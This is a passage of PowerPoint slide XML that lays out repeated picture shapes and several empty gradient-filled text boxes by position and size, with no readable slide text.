          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29701" name="Picture 53" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6311900" y="2592388"/>
            <a:ext cx="466725" cy="1666875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29702" name="Picture 54" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7670800" y="2592388"/>
            <a:ext cx="466725" cy="1666875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721400" name="Text Box 56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="315913" y="2917825"/>
            <a:ext cx="1247775" cy="3387725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:gamma/>
                  <a:tint val="50196"/>
                  <a:invGamma/>
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="shape">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721402" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1700213" y="2917825"/>
            <a:ext cx="1247775" cy="3387725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:gamma/>
                  <a:tint val="50196"/>
                  <a:invGamma/>
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="shape">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721403" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3084513" y="2917825"/>
            <a:ext cx="1247775" cy="3387725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:gamma/>
                  <a:tint val="50196"/>
                  <a:invGamma/>
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="shape">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721404" name="Text Box 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4519613" y="2917825"/>
            <a:ext cx="1247775" cy="3387725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:gamma/>
                  <a:tint val="50196"/>
                  <a:invGamma/>
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="shape">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721405" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5878513" y="2917825"/>
            <a:ext cx="1247775" cy="3387725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:gamma/>
                  <a:tint val="50196"/>
                  <a:invGamma/>
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="shape">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721406" name="Text Box 62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7275513" y="2917825"/>
            <a:ext cx="1247775" cy="3387725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:gamma/>
                  <a:tint val="50196"/>
                  <a:invGamma/>
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="shape">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29709" name="Picture 49" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="673100" y="2592388"/>
            <a:ext cx="466725" cy="1666875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29710" name="Picture 2" descr="500110_sl01b"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4238625" y="2301875"/>
            <a:ext cx="1800225" cy="4565650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29711" name="Picture 3" descr="500110_sl01b"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="60325" y="2301875"/>
            <a:ext cx="1800225" cy="4565650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29712" name="Picture 4" descr="500110_sl01b"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="2301875"/>
            <a:ext cx="1800225" cy="4565650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29713" name="Picture 5" descr="500110_sl01b"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2844800" y="2301875"/>
            <a:ext cx="1800225" cy="4565650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29714" name="Picture 6" descr="500110_sl01b"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5645150" y="2384425"/>
            <a:ext cx="1800225" cy="4565650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29715" name="Picture 7" descr="500110_sl01b"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7035800" y="2301875"/>
            <a:ext cx="1800225" cy="4565650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29716" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1662113" y="3044825"/>
            <a:ext cx="1360487" cy="2605088"/>
          </a:xfrm>
